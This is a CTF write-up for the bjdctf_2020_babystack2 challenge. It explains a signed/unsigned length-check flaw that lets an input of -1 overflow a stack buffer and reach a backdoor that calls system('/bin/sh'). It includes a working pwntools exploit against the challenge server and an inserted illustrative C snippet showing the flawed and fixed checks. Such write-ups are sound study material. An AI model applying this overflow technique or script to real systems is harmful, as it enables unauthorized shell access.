【CTF】bjdctf_2020_babystack2
2022-07-02 00:19:00 【delta_hell】
Challenge analysis
Decompile the binary and look for vulnerabilities.
The main function:
undefined8 main(void)
{
    undefined local_18 [12];
    uint local_c;

    setvbuf(stdout,(char *)0x0,2,0);
    setvbuf(stdin,(char *)0x0,1,0);
    local_c = 0;
    puts("**********************************");
    puts("* Welcome to the BJDCTF! *");
    puts("* And Welcome to the bin world! *");
    puts("* Let\'s try to pwn the world! *");
    puts("* Please told me u answer loudly!*");
    puts("[+]Are u ready?");
    puts("[+]Please input the length of your name:");
    __isoc99_scanf(&DAT_004009c1,&local_c);
    if (10 < (int)local_c) {
        puts("Oops,u name is too long!");
        /* WARNING: Subroutine does not return */
        exit(-1);
    }
    puts("[+]What\'s u name?");
    read(0,local_18,(ulong)local_c);
    return 0;
}
The backdoor function:
undefined8 backdoor(void)
{
    system("/bin/sh");
    return 1;
}
The intent of the challenge is obvious: a backdoor function is provided, and all we need to do is jump to it.
Looking at main again, the read call is clearly the exploitation point, and the variable local_c can be used to create an overflow.
Of course, it is not quite that simple: there is a length check in front of it,
if (10 < (int)local_c)
but that is easy too, isn't it? local_c is an unsigned int that is compared as a signed int, so a negative number passes the check and is then handed to read as a huge unsigned count ~~~
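To make the sign-confusion in that check concrete, here is an added illustration (not code from the challenge binary or the original post) that reproduces the decompiled comparison as a pure function, places the corrected check beside it, and simulates whether a copy of a given length would run past the 12-byte buffer. The buffer size 12, the cut-off 10 and the cast to (int) come from the decompilation above; the function names are my own.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

#define BUF_SIZE 12   /* undefined local_18[12] in the decompiled main() */

/* The check as decompiled: local_c is a uint, but the comparison casts it to
 * int. scanf("%d") on "-1" stores 0xffffffff, which (on two's-complement
 * targets) reads back as -1 and therefore passes "10 < (int)local_c". */
bool vulnerable_check_accepts(unsigned int user_len) {
    return !(10 < (int)user_len);
}

/* What read(0, buf, (ulong)local_c) is actually asked for: the same bits
 * widened as an unsigned value, so "-1" becomes 4294967295 on x86-64. */
size_t count_passed_to_read(unsigned int user_len) {
    return (size_t)user_len;
}

/* Corrected check: compare as the unsigned type it is and bound the count by
 * the destination buffer, so no sign trick turns a rejection into acceptance. */
bool fixed_check_accepts(unsigned int user_len, size_t buf_size) {
    return user_len <= buf_size;
}

/* Simulate the consequence of the accepted count: read() copies at most
 * min(count, bytes available); report whether that copy exceeds the buffer. */
bool copy_would_overflow(size_t read_count, size_t input_len, size_t buf_size) {
    size_t n = read_count < input_len ? read_count : input_len;
    return n > buf_size;
}

int main(void) {
    /* Constructed sample inputs: a normal name length, one just over the
     * limit, and the bit pattern scanf stores for "-1". */
    unsigned int inputs[] = { 5u, 11u, 0xffffffffu };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        bool v = vulnerable_check_accepts(inputs[i]);
        bool f = fixed_check_accepts(inputs[i], BUF_SIZE);
        printf("input 0x%08x: decompiled check %s", inputs[i],
               v ? "accepts" : "rejects");
        if (v) {
            size_t cnt = count_passed_to_read(inputs[i]);
            printf(" (read count %zu, 24-byte input overflows: %s)", cnt,
                   copy_would_overflow(cnt, 24, BUF_SIZE) ? "yes" : "no");
        }
        printf("; fixed check %s\n", f ? "accepts" : "rejects");
    }
    return 0;
}
```

Compiled on a 64-bit Linux host, the run shows 5 accepted by both checks, 11 rejected by both, and 0xffffffff accepted only by the decompiled check, with read asked for 4294967295 bytes. The fix is to keep the comparison unsigned and tie the bound to the real buffer size rather than a loose constant.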
As it turned out, the idea was completely correct, but the process was very tortuous. Briefly:
Overflowing locally failed. On Ubuntu, entering -1 made read return immediately; in an experiment on Windows, entering -1 made read pop up a window saying the condition buf len < INT_MAX was not satisfied. That much is obvious: read has a limit on its input. I studied it for a long time and found no solution, because with the length limit a negative number has to be used, otherwise there is no overflow; and even INT_MIN, converted to an unsigned number, is still 2147483648, still > INT_MAX. At that point I started to doubt life.
Approach
The approach is the analysis above, which is absolutely right: go straight at the target and verify, and it works. -1 gets past the length limit, and at the same time read does not complain (no tears left to cry).
from pwn import *

sh = connect("node4.buuoj.cn", 27462)
sh.recvuntil(b"name:\n")
print("recv name length")
sh.sendline(b"-1")            # passes the (int) length check, read() gets a huge count
print("send name length")
sh.recvline()
pad = b"A" * 24               # fill local_18 up to the saved return address
payload = pad + p64(0x00400726)   # address used by the original script
sh.sendline(payload)
sh.interactive()
The downside of not being able to verify locally: the overflow length was guessed.
Summary
When there is nothing wrong with your reasoning, test against the target machine promptly. Debugging locally was still interesting, though, even if I never found the final answer: for example, on Ubuntu I wrote a test demo with the length check removed, and the result was that read is fine as long as the count is not greater than 3652; beyond that, errno reports Bad address, which is different from Windows. But the value 3652 makes no sense at all, and I doubted life again ~~~ I'll leave it alone after work and come back to it when I get a chance to debug glibc.